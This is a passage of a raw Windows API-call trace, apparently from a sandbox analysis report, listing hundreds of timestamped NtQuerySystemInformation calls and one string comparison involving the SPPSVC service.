SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x50, ResultLength=0x0) [0284.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x28, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0284.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.712] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce88, Length=0x50, ResultLength=0x0) [0284.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0284.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.732] 